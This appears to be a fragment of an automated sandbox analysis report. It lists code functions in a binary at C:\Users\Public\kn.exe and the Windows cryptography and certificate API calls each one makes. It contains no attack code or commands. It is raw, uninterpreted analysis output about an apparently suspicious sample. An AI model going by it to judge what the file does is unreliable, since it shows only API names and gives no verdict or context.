Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C4E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,7_2_00007FF6AA2C4E58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6E48 NCryptSetProperty,#360,7_2_00007FF6AA2B6E48
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6EA8 NCryptImportKey,#360,7_2_00007FF6AA2B6EA8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AEE94 CryptSignMessage,SetLastError,7_2_00007FF6AA2AEE94
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA220E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,7_2_00007FF6AA220E94
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA252E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF6AA252E7C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF6AA280EF4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2E0ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,7_2_00007FF6AA2E0ED0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6F2C NCryptExportKey,#360,7_2_00007FF6AA2B6F2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA218F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,7_2_00007FF6AA218F1C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA276374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,7_2_00007FF6AA276374
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA272358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,7_2_00007FF6AA272358
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20E3B0 #357,#357,CryptDecodeObject,LocalFree,7_2_00007FF6AA20E3B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2223E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,7_2_00007FF6AA2223E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B8404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF6AA2B8404
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA204410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA204410
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA25A450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,7_2_00007FF6AA25A450
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA25C450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,7_2_00007FF6AA25C450
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA278488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA278488
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F44E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA1F44E0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2524D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,7_2_00007FF6AA2524D4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AE516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF6AA2AE516
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,7_2_00007FF6AA20C514
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2E613C CryptDecodeObjectEx,7_2_00007FF6AA2E613C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A61AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,7_2_00007FF6AA2A61AC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2221A4 #360,#359,#357,#357,BCryptFreeBuffer,7_2_00007FF6AA2221A4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA266194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF6AA266194
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF6AA24417C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26A1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,7_2_00007FF6AA26A1E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2E6214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,7_2_00007FF6AA2E6214
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA27E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF6AA27E1F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2BA1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,7_2_00007FF6AA2BA1F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AE274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF6AA2AE274
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B8298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,7_2_00007FF6AA2B8298
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A2278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,7_2_00007FF6AA2A2278
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA256280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA256280
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2EA2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,7_2_00007FF6AA2EA2E0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA220300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,7_2_00007FF6AA220300
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2BA740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6AA2BA740
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280740 BCryptCloseAlgorithmProvider,#205,#357,#357,7_2_00007FF6AA280740
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2807A4 BCryptDestroyHash,#205,#357,7_2_00007FF6AA2807A4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2807F4 BCryptDestroyKey,#205,#357,7_2_00007FF6AA2807F4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26C7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF6AA26C7F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2907D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF6AA2907D0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2727BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA2727BC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1E67CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA1E67CC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA206824 CryptHashCertificate,GetLastError,#357,7_2_00007FF6AA206824
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B8814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,7_2_00007FF6AA2B8814
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280844 BCryptExportKey,#205,#359,#357,#357,7_2_00007FF6AA280844
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2EE8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,7_2_00007FF6AA2EE8B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2808EC BCryptGetProperty,#205,#359,#357,#357,7_2_00007FF6AA2808EC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1FA8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,7_2_00007FF6AA1FA8CC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B4914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6AA2B4914
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26E914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,7_2_00007FF6AA26E914
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2865B4 NCryptIsKeyHandle,_CxxThrowException,7_2_00007FF6AA2865B4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2BA590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF6AA2BA590
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2EA58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,7_2_00007FF6AA2EA58C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA27E57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,7_2_00007FF6AA27E57C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2425E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF6AA2425E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF6AA20C5D4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA210630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA210630
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA208600 #357,CryptDecodeObject,GetLastError,LocalFree,7_2_00007FF6AA208600
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6654 NCryptGetProperty,#360,7_2_00007FF6AA2B6654
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24A654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,7_2_00007FF6AA24A654
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA254694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,7_2_00007FF6AA254694
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA216694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,7_2_00007FF6AA216694
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B66D8 NCryptFreeObject,#360,7_2_00007FF6AA2B66D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A86D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,7_2_00007FF6AA2A86D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2226E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,7_2_00007FF6AA2226E0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA272724 CryptDecodeObject,GetLastError,#357,7_2_00007FF6AA272724
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B7B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,7_2_00007FF6AA2B7B60
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2BBB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,7_2_00007FF6AA2BBB50
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28FB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,7_2_00007FF6AA28FB50
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B5B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,7_2_00007FF6AA2B5B44
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24BB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA24BB38
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1E5BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF6AA1E5BA4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AFB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,7_2_00007FF6AA2AFB94
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2E5B90 CryptDecodeObjectEx,memmove,7_2_00007FF6AA2E5B90
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20BB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,7_2_00007FF6AA20BB80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA283BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA283BEB
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA209BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,7_2_00007FF6AA209BC8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28BBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF6AA28BBC0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA23FC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA23FC34
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF6AA21FC20
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA233C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF6AA233C60
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2E5C54 CryptDecodeObjectEx,CryptDecodeObjectEx,7_2_00007FF6AA2E5C54
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA221C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,7_2_00007FF6AA221C50
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA271C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,7_2_00007FF6AA271C84
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA275CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,7_2_00007FF6AA275CE8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AFD2C CryptDecryptMessage,GetLastError,#357,7_2_00007FF6AA2AFD2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA29DD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,7_2_00007FF6AA29DD1C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A9970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,7_2_00007FF6AA2A9970
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26B950 I_CryptGetLruEntryData,#357,7_2_00007FF6AA26B950
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA23F944 CryptDecodeObject,GetLastError,#357,7_2_00007FF6AA23F944
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA217988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,7_2_00007FF6AA217988
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,7_2_00007FF6AA26597C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2DB980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,7_2_00007FF6AA2DB980
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26B9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,7_2_00007FF6AA26B9CC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF6AA20F9B8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2BBA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,7_2_00007FF6AA2BBA14
